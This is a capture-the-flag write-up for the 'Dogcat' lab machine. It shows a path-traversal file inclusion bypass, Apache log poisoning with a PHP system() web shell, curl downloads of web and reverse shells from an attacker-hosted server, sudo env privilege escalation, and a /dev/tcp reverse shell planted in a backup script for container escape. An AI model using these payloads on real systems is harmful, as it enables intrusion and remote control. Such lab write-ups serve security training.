Dogcat
Last updated
Was this helpful?
Last updated
Was this helpful?
Description:
I made a website where you can look at pictures of dogs and/or cats!
nmap -sCSV -O
we have two doors open
80 running apache 2.4.38
and
22 running openssh
by clicking on "A dog"
by clicking on "A cat"
By analyzing the url, we can try to see other files besides the conventional ones, for example:
"Sorry, only dogs or cats are allowed."
this message leads us to think that the system checks whether we type "cat or dog" in the url
to bypass, we can use cat/../
that is, we will enter the folder "cats", we will leave and then we will go back to where we were but the url will pass in the verification
Does it work?
this tried to read the index.php but gave some error. but it worked
Local File Inclusion
we can read .php files from the server
trying to read files with other extensions we have this error:
"passwd.php"
the system adds the .php extension by default
we can try to read the file "index.php", without errors by coding it in base64 using "php Wrapper filter"
view=php://filter/convert.base64-encode/resource=cat/../index
decoding this base64 we can view the index.php source code and understand how it works
here we can see that the system only defines the extension when we do not define "ext".
we can read all files using "ext"
example, reading /etc/passwd
/?view=cat/../../../../../../../../etc/passwd&ext=
(Remote Code Execution)
in this case, we were able to scale from an LFI to a RCE by reading the log files
to read apache2 log files :
/?view=cat/../../../../../../../../var/log/apache2/access.log&ext=
now if we inject php code into the log, it will be executed, that we get a RCE
to do this I will use a proxy called burpsuite, to intercept the connection and inject code replacing the user agent
writing a shell
<?php echo system($_GET['cmd']); ?>
refreshing and viewing the source code :
it works!
now we can run commands in URL using &cmd=
view-source:http:///?view=cat/../../../../../../../../var/log/apache2/access.log&ext=&cmd=ls
view-source:http:///?view=cat/../../../../../../../../var/log/apache2/access.log&ext=&cmd=cat+flag.php
to see what we can use to get a web shell, we can list the machine's binaries
view-source:http:///?view=cat/../../../../../../../../var/log/apache2/access.log&ext=&cmd=ls+/usr/bin
i will use curl to get a shell from my machine
in our machine:
installing the powny shell
sudo python3 -m http.server 80
now I will download the file and put it in /var/www/html
in the box machine (RCE)
view-source:http:///?view=cat/../../../../../../../../var/log/apache2/access.log&ext=&cmd=curl <your_ip>/powny.php -o /var/www/html/powny.php
it works
we will use php-reverse-shell from pentest monkey
so
in our machine:
installing the rev shell
(use nano or vim to change the ip and port)
sudo python3 -m http.server 80
in the web shell :
curl <your_ip>/php-reverse-shell.php -o /var/www/html/shell.php
and now is just enter in:
/shell.php
cd /tmp/
installing linpeas
in our machine:
installing the linpeas
sudo python3 -m http.server 80
in the reverse shell:
curl <your_ip>/linpeas.sh -o /tmp/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh > output.txt &
reading the output
cat output.txt
linpeas pointed to this binary (/usr/bin/env) as a 99% chance of being vulnerable to privilege escalation
checking in GTFObins about this binary
sudo env /bin/sh
as root. in the root (/) of the system we see:
which shows that docker is installed on this machine and we have to do a "Container escape"
so searching for scripts
find / -type f -name *.sh
we find : /opt/backups/backup.sh
this script compresses files from outside the container, so I will replace it with a reverse shell and it will be called from outside the container too
echo '#!/bin/bash' > /opt/backups/backup.sh
echo 'bash -i >& /dev/tcp//1234 0>&1' >> /opt/backups/backup.sh
and just wait
a few minutes later:
wget -O powny.php
wget
wget
